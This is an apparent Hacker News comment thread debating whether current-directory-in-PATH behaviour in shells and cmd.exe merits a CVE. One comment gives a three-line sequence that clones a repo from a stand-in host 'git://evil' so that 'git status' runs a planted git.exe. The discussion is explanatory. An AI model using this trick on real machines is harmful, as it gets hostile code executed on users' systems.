Remix.run Logo
x3n0ph3n3 2 hours ago

Same thing happens if I have a:

1) PS1 that displays the current git branch

2) Include the current directory in my PATH

Should we file a high severity CVE with bash now?

loumf 2 hours ago | parent | next [-]

It’s been known for decades that you should never put your current directory in your PATH. There are endless opportunities for vulnerabilities then. I learned this in college in the 80’s (by not following it and getting owned).

jwolfe 2 hours ago | parent | prev | next [-]

If bash placed the current directory in your PATH by default, then yes.

lyu07282 43 minutes ago | parent [-]

Could file a CVE with Microsoft then, cause thats kinda what cmd.exe is doing:

    > git clone git://evil evil
    > cd evil\
    > git status
The last line would execute git.exe from the cloned repo, wouldn't it?
Firehawke an hour ago | parent | prev | next [-]

Not with bash. If your distro is putting ./ into the path then that's absolutely a high severity CVE with your distro's config.

shitter 2 hours ago | parent | prev [-]

I would file a CVE for any program that places untrusted content into PATH and invokes non-fully qualified executable names - not for the shell.